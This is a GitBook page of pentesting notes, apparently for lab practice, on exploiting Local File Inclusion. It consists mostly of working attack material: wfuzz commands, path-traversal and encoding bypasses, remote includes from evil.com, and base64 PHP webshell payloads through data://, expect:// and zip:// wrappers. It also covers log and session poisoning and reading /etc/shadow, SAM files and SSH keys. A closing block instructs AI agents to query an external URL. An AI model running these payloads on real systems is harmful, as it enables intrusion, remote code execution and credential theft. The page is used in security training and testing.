# Local File Inclusion
### Fuzzing with wfuzz
{% embed url="" %}
The key is taking a look at unusual responses and filtering them using `-hh`, for example in this case most responses had a character count of around 300 characters on average, so whenever one would pop up that had 13000 it meant that the content was being displayed.
This also gives us a hint on how the Local FIle Inclusion is working.
#### Windows
{% embed url="" %}
Reference this list for LFI so we can get creds for other services around.
```
wfuzz -w /usr/share/wordlists/wfuzz/vulns/lfi-windows.txt -u http://192.168.242.53:8080/site/index.php\?page\=FUZZ
```
#### Linux
```
wfuzz -w /usr/share/wordlists/wfuzz/vulns/lfi-linux.txt -u http://192.168.242.53:8080/site/index.php\?page\=FUZZ
```
The guide above should help you depending on how the website reacts.
Look for files associated with other services around that could give you access.
* [ ] /etc/passwd and /etc/shadow
* [ ] /home/user/ssh/id\_rsa and change persmissions and ssh
* [ ] Look at services around for example filezilla stores creds for the server ftp server in cleartext.
#### LFI + TOMCAT
Look at the version of tomcat and depending on its version we can gather credentials for the manager site and gain rce by uploading a war file.
By transversing to: /usr/share/**tomcat9**/etc/tomcat-users.xml
We were able to gather credentials.
#### LFI + Redis
{% embed url="" %}
Try to enumerate where we can load files using redis, make a php reverse shell or any sort of code and we can easily use lfi to execute the code we wrote.
#### LFI + Filezilla
Using the reference list above we can gather credentials for the Filezilla FTP server.
### Bypassing Tricks
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```
#### Null byte
This was patched since PHP 5.4
```
http://example.com/index.php?page=http://evil.com/shell.txt%00
```
#### Double encoding
```
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
#### From existing folder
```
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
#### Wrapper php\://filter
```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
```
### RCE Methods
#### PHP Wrappers
**Wrapper input://**
```
curl -k -v "http://example.com/index.php?page=php://input" --data ""
```
Since we have code execution all we have to do is make sure that we get a reverse shell using different payloads from Payloads of All things.
#### Wrapper data://
```
echo '' | base64 -w0 -> PD9waHAgcGhwaW5mbygpOyA/Pgo=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=
Or
menu.php?file=data:text/plain,
If code execution, you should see phpinfo(), go to the disable_functions and craft a payload with functions which aren't disable.
Code execution with
- exec
- shell_exec
- system
- passthru
- popen
# Exemple
echo '' | base64 -w0 -> PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
If there is "Shell done !" on the webpage, then there is code execution and you can do things like :
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls
http://example.com/index.php?page=expect://id
http://example.net/?page=data://text/plain,
http://example.net/?page=data://text/plain,
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,
http://example.net/?page=data:text/plain,
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is ""
```
{% embed url="" %}
#### Wrapper Expect://
```
http://example.com/index.php?page=expect://id
```
#### Wrapper zip\://
```
echo "" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
### LFI to RCE via controlled log file
Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
```
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/apache2/access.log
http://example.com/index.php?page=/var/log/apache2/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
```
#### RCE via SSH
Try to ssh into the box with a PHP code as username ``.
```
ssh @10.10.10.10
```
Then include the SSH log files inside the Web Application.
```
http://example.com/index.php?page=/var/log/auth.log&cmd=id
```
### **Via** **vsftpd** ***logs***
The logs of this FTP server are stored in ***/var/log/vsftpd.log.*** If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI
#### RCE via Mail
First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
```
root@kali:~# telnet 10.10.10.10. 25
Trying 10.10.10.10....
Connected to 10.10.10.10..
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: mail@example.com
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with .
subject:
data2
.
```
In some cases you can also send the email with the `mail` command line.
```
mail -s "" www-data@10.10.10.10. < /dev/null
```
#### RCE via Apache logs
Poison the User-Agent in access logs:
```
$ curl http://example.org/ -A ""
```
Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
Then request the logs via the LFI and execute your command.
```
$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
```
```
kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
' . shell_exec($_GET['cmd']) . '';?>
HTTP/1.1 400 Bad Request
```
Reagardless we are still able to access the C:\xampp\apache\logs\access.log and execute the shell.
### LFI to RCE via PHP sessions
Check if the website use PHP Session (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
In PHP these sessions are stored into /var/lib/php5/sess\_\[PHPSESSID] or /var/lib/php/session/sess\_\[PHPSESSID] files
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
Set the cookie to ``
```
login=1&user=&pass=password&lang=en_us.php
```
Use the LFI to include the PHP session file
```
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```
### LFI to RCE via credentials files
This method require high privileges inside the application in order to read the sensitive files.
#### Windows version
First extract `sam` and `system` files.
```
http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
```
Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
#### Linux version
First extract `/etc/shadow` files.
```
http://example.com/index.php?page=../../../../../../etc/shadow
```
Then crack the hashes inside in order to login via SSH on the machine.
Another way to gain SSH access to a Linux machine through LFI is by reading the private key file, id\_rsa. If SSH is active check which user is being used `/proc/self/status` and `/etc/passwd` and try to access `//.ssh/id_rsa`.
Examples of Local File Inclusion Exploitation
[https://app.gitbook.com/s/C01qT6YExS9JZIncykrV/exploitation](https://lyethar.gitbook.io/slort/exploitation) (Slort PG)
### Resources
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://lyethar.gitbook.io/methodology/readme/exploitation/web-applications/local-file-inclusion.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.